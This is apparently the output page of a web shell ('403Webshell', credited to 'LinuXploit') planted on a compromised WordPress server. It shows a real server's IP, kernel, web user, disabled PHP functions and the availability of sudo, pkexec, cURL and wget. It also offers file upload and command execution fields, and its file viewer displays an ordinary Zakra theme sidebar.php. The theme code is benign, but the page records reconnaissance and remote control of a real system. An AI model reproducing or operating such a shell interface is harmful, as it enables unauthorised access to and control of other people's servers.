403Webshell
Server IP : 158.247.231.215  /  Your IP : 216.73.217.84
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux CTMS 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /mnt/blockstorage/ctms/wp-content/themes/zakra/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /mnt/blockstorage/ctms/wp-content/themes/zakra/sidebar.php
<?php
/**
 * The sidebar containing the main widget area
 *
 * @link    https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package zakra
 */

// Exit if accessed directly.
defined( 'ABSPATH' ) || exit;

$sidebar = apply_filters( 'zakra_get_sidebar', 'sidebar-right' );

// Hide sidebar when sidebar is not present.
if ( in_array( zakra_get_current_sidebar_layout(), array( 'zak-site-layout--no_sidebar', 'zak-site-layout--centered', 'zak-site-layout--default', 'zak-site-layout--stretched' ), true ) ) {
	return '';
}
?>

<aside id="zak-secondary" class="zak-secondary <?php zakra_sidebar_class(); ?>">
		<?php
		/*
		 * Hook - zakra_sidebar_before.
		 *
		 * @hooked zakra_sidebar_before_action - 10
		 */
		do_action( 'zakra_sidebar_before' );

		if ( is_active_sidebar( $sidebar ) ) {
			dynamic_sidebar( $sidebar );
		} elseif ( current_user_can( 'edit_theme_options' ) ) {
			?>
			<section class="widget">
				<h2 class="widget-title"><?php echo esc_html( zakra_get_sidebar_name_by_id( $sidebar ) ); ?></h2>
				<a href="<?php echo esc_url( admin_url( 'widgets.php' ) ); ?>"><?php esc_html_e( 'Click here to add widgets for this area', 'zakra' ); ?></a>
			</section>
			<?php
		} else {

			the_widget(
				'WP_Widget_Text',
				array(
					'title'  => esc_html__( 'Example Widget', 'zakra' ),
					'text'   => sprintf(
					/* Translators: 1. Label for Contact Page or Right sidebar area, 2. Opening of the link for widgets.php WordPress section, 3. Closing of the link for widgets.php WordPress section */
						esc_html__( 'This is an example widget to show how the %1$s Sidebar looks by default. You can add custom widgets from the %2$swidgets screen%3$s in the admin. If custom widgets is added than this will be replaced by those widgets.', 'zakra' ),
						current_user_can( 'edit_theme_options' ) ? '<a href="' . admin_url( 'widgets.php' ) . '">' : '',
						current_user_can( 'edit_theme_options' ) ? '</a>' : '',
						esc_html__( 'Example Widget', 'zakra' )
					),
					'filter' => true,
				),
				array(
					'before_widget' => '<aside class="widget widget_text">',
					'after_widget'  => '</aside>',
					'before_title'  => '<h3 class="zak-widget-title"><span>',
					'after_title'   => '</span></h3>',
				)
			);

		}

		/*
		 * Hook - zakra_sidebar_after.
		 *
		 * @hooked zakra_sidebar_after_action - 10
		 */
		do_action( 'zakra_sidebar_after' );

		?>

</aside><!-- .zak-secondary -->

Youez - 2016 - github.com/yon3zu
LinuXploit